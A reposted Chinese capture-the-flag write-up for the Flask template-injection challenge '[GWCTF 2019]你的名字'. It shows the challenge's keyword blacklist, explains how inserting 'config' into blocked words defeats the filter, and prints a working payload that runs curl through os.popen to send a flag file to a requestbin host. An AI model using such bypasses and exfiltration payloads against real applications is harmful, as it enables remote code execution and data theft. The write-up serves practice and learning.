碼上快樂

相關內容    簡體    繁體

刷題記錄:[GWCTF 2019]你的名字

本文轉載自   查看原文   2020-02-14 17:26   1044    web刷題

目錄

題目復現鏈接:https://buuoj.cn/challenges

flask SSTI

{{被過濾,用{% if ... %}{% endif %}代替,用os.popen+curl來帶出數據

黑名單過濾邏輯錯誤

blacklist = ['import', 'getattr', 'os', 'class', 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'for',
                 ' subprocess', 'file', 'open', 'popen', 'builtins', 'compile', 'execfile', 'from_pyfile', 'local',
                 'self', 'item', 'getitem', 'getattribute', 'func_globals', 'config']
for no in blacklist:
    while True:
        if no in s:
            s = s.replace(no, '')
        else:
            break
return s

這個邏輯是按順序針對每個關鍵詞過濾,只能應付雙寫繞過,還可以用列表的最后一項來繞過過濾

{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclaconfigsses__()[59].__init__.func_glconfigobals.lineconfigcache.oconfigs.popconfigen('curl http://http.requconfigestbin.buuoj.cn/1inhq4f1 -d `cat /flag_1s_Hera`;') %}1{% endiconfigf %}

注意buuoj的requestbin的url里面也有個request


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 刷題[GWCTF 2019]你的名字 刷題記錄:[EIS 2019]EzPOP 刷題記錄:[ByteCTF 2019]EZCMS ZJOI2019一輪停課刷題記錄 刷題記錄:[FBCTF2019]Products Manager 刷題記錄:[DDCTF 2019]homebrew event loop 刷題記錄:[SWPU2019]Web1 Atcoder刷題記錄 刷題記錄 LeetCode刷題記錄
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM